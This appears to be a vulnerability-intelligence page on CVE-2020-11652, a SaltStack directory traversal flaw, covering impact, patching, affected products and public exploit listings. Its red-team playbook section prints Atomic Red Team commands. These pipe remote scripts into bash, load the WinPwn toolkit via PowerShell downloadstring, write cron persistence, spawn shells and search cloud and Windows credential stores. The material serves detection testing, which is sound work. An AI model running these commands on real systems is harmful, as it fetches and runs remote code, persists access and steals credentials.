CVE-2020-11652
Overview
This vulnerability is a directory traversal flaw caused by improper sanitization of file system paths within the ClearFuncs class of the salt-master process. The root cause lies in the failure to correctly validate and restrict user-supplied path inputs, enabling authenticated users to access arbitrary directories. The affected component is SaltStack Salt versions prior to 2019.2.4 and 3000 versions before 3000.2.
Vulnerability Description
An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.
Impact
An attacker with valid authentication can leverage this vulnerability to access sensitive directories outside the intended scope, potentially exposing confidential files and system information. This unauthorized directory access may facilitate further attacks such as information disclosure or privilege escalation within the SaltStack environment. The prerequisite is possession of a low-privileged authenticated account on the salt-master service. In operational contexts, this can lead to data breaches and compromise of system integrity.
Solution
Remediation requires upgrading SaltStack Salt to version 2019.2.4 or later, or to 3000.2 or later for the 3000 series, as detailed in the official SaltStack release notes (https://docs.saltstack.com/en/latest/topics/releases/2019.2.4.html and https://github.com/saltstack/salt/blob/v3000.2_docs/doc/topics/releases/3000.2.rst). Additional guidance and security announcements are available from Debian (DSA-4676), openSUSE, Cisco, and Ubuntu advisories (e.g., https://www.debian.org/security/2020/dsa-4676, http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00047.html). Users should apply these updates promptly to mitigate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the SaltStack Salt software arises from improper sanitization of paths within the salt-master process's ClearFuncs class. This flaw allows authenticated users to access arbitrary directories on the system, potentially leading to unauthorized data exposure or manipulation. The issue is particularly concerning as it affects multiple versions of the software, including those prior to 2019.2.4 and 3000 before 3000.2. The lack of adequate input validation in the path-handling methods means that attackers can exploit this vulnerability to traverse the file system, gaining access to sensitive files and directories that should be restricted.
Attack vectors for this vulnerability primarily involve authenticated users leveraging their access rights to execute commands that exploit the flawed path sanitization. An attacker could craft requests that manipulate the path parameters, allowing them to navigate outside of designated directories. For instance, an attacker could use directory traversal techniques to access configuration files, user data, or even system binaries. This exploitation could be executed through various interfaces provided by the Salt software, including command-line tools or API endpoints, making it a versatile threat in environments where SaltStack is deployed.
The real-world impact of this vulnerability can be significant, particularly for organizations that rely on SaltStack for configuration management and orchestration. If exploited, an attacker could gain access to sensitive information, leading to data breaches or unauthorized changes to system configurations. This could result in operational disruptions, financial losses, and reputational damage. Furthermore, the presence of this vulnerability in widely used distributions such as Debian and Ubuntu increases the risk, as many organizations may not be aware of the potential exposure due to outdated software versions. The business risk is compounded by regulatory implications, especially for organizations handling sensitive data subject to compliance requirements.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating SaltStack to the latest versions is crucial, as patches have been released to address this issue. Additionally, organizations should conduct thorough security assessments and audits of their SaltStack configurations to identify any potential misuse of the affected functionalities. Monitoring logs for unusual access patterns or unauthorized attempts to access sensitive directories can also help in early detection of exploitation attempts. Furthermore, employing the principle of least privilege can limit the potential impact by ensuring that authenticated users have only the necessary permissions required for their roles.
In conclusion, the vulnerability within the SaltStack Salt software represents a significant threat due to its potential for directory traversal and unauthorized access. The combination of improper path sanitization and the wide adoption of the affected software creates a pressing need for organizations to prioritize security measures. By staying informed about vulnerabilities, applying timely updates, and enforcing strict access controls, organizations can mitigate the risks associated with this and similar vulnerabilities, thereby enhancing their overall security posture.
Recent developments in the exploitation landscape of CVE-2020-11652 indicate a marked escalation in attacker capabilities and accessibility. CSURFACE threat intelligence has identified the emergence of multiple public proof-of-concept exploits hosted on prominent code repositories, alongside the introduction of dedicated Metasploit modules that significantly lower the technical barrier for exploitation. This expansion in available tooling correlates with the vulnerability’s inclusion in the CISA Known Exploited Vulnerabilities catalog and a substantial increase in its EPSS score, signaling heightened exploitation likelihood. Our telemetry confirms a notable surge in scanning and attempted exploitation activity targeting vulnerable SaltStack Salt deployments, underscoring an elevated operational risk. The updated CVSS score to 6.5 reflects this increased severity, emphasizing that previously theoretical risks have materialized into active threats. For defenders, these changes translate into an urgent need to reassess exposure, as automated and semi-automated attacks leveraging these new tools can facilitate unauthorized directory access and remote code execution with greater ease. The threat level has thus shifted from moderate concern to a more pronounced medium-high risk, driven by the convergence of exploit availability, active targeting, and authoritative cataloging.
Affected Products (13)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Saltstack | Salt | All |
cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*
|
|
|
Saltstack | Salt | All |
cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*
|
|
|
Opensuse | Leap | 15.1 |
cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 8.0 |
cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 9.0 |
cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 10.0 |
cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*
|
|
|
Canonical | Ubuntu Linux | 16.04 |
cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*
|
|
|
Canonical | Ubuntu Linux | 18.04 |
cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*
|
|
|
Blackberry | Workspaces Server | All |
cpe:2.3:a:blackberry:workspaces_server:*:*:*:*:*:*:*:*
|
|
|
Blackberry | Workspaces Server | All |
cpe:2.3:a:blackberry:workspaces_server:*:*:*:*:*:*:*:*
|
|
|
Blackberry | Workspaces Server | 9.1.0 |
cpe:2.3:a:blackberry:workspaces_server:9.1.0:*:*:*:*:*:*:*
|
|
|
Vmware | Application Remote Collector | 7.5.0 |
cpe:2.3:a:vmware:application_remote_collector:7.5.0:*:*:*:*:*:*:*
|
|
|
Vmware | Application Remote Collector | 8.0.0 |
cpe:2.3:a:vmware:application_remote_collector:8.0.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (2)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
SaltStack Salt Master/Minion Unauthenticated RCE
exploits/linux/misc/saltstack_salt_unauth_rce
|
F-Secure, wvu | Unknown | - | View |
|
SaltStack Salt Master Server Root Key Disclosure
auxiliary/gather/saltstack_salt_root_key
|
F-Secure, wvu | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Saltstack 3000.1 - Remote Code Execution | Jasper Lievisse Adriaanse | remote | multiple | - | View |
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Al1ex/CVE-2020-11652
CVE-2020-11652 & CVE-2020-11651
|
Al1ex | 6 | 3 | 2020-12-25 | View |
|
limon768/CVE-2020-11652-POC
This is a fix POC CVE-2020-11651 & CVE-2020-11651
|
limon768 | 4 | 0 | 2024-01-17 | View |
|
fanjq99/CVE-2020-11652
saltstack CVE-2020-11652
|
fanjq99 | 0 | 0 | 2020-05-22 | View |
Threat Feed
7 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.